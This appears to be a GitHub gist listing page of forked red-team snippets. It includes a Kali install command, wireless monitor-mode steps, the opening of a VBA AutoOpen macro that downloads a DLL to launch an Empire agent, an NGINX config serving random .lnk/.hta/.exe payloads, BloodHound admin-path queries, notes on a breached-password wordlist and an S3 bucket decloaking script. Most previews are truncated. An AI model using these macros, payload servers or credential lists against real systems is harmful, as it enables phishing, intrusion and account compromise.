Command:
apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
Command:
slooppe
slooppe
/ Kali_Desktop_Environments_Installation_and_Removal.md
Created
May 5, 2020 17:30
— forked from jayluxferro/Kali_Desktop_Environments_Installation_and_Removal.md
Kali Desktop Environments Installation and Removal
slooppe
/ Wireless Penetration Testing Cheat Sheet.md
Created
May 5, 2020 17:25
— forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
slooppe
/ Empire_via_rundll-powershdll.vba
Created
December 27, 2018 23:08
— forked from vivami/Empire_via_rundll-powershdll.vba
VBA macro executing Empire Agent using PowerShdll via rundll
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Debugging | |
| End Sub | |
| Sub Document_Open() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| DownloadDLL |
slooppe
/ gist:e95d4534520033532b8bbdf89f4d6bfc
Created
December 25, 2018 12:37
— forked from jivoi/gist:a33ace2e25515a31aa2ffbae246d98c9
Serving Random Payloads with NGINX
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Serving Random Payloads with NGINX | |
| # add set_random module https://github.com/openresty/set-misc-nginx-module#set_random | |
| # edit file /etc/nginx/sites-enabled/default | |
| set_random $uri 1 3; | |
| map $uri $payloads { | |
| 1 /payload.lnk; | |
| 2 /payload.hta; | |
| 3 /payload.exe; |
slooppe
/ sshuttle.sh
Created
November 17, 2018 13:14
— forked from Davor111/sshuttle.sh
How to use sshuttle with .key, .csr or .pem files for authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #It's not directly mentioned in the documentation on how to do this, so here you go. This command will tunnel everything including DNS: | |
| sshuttle --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem' |
slooppe
/ gist:81d25aabe407414bbfeccb3587469cd7
Created
November 4, 2018 15:20
— forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Useful Cypher queries for BloodHound
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --------------- | |
| MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
| RETURN u.name | |
| That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
| --------------- | |
| MATCH | |
| (U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) |
slooppe
/ breachcompilation.txt
Created
November 3, 2018 13:15
1.4 billion password breach compilation wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
slooppe
/ bucket-disclose.sh
Created
November 2, 2018 16:31
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
NewerOlder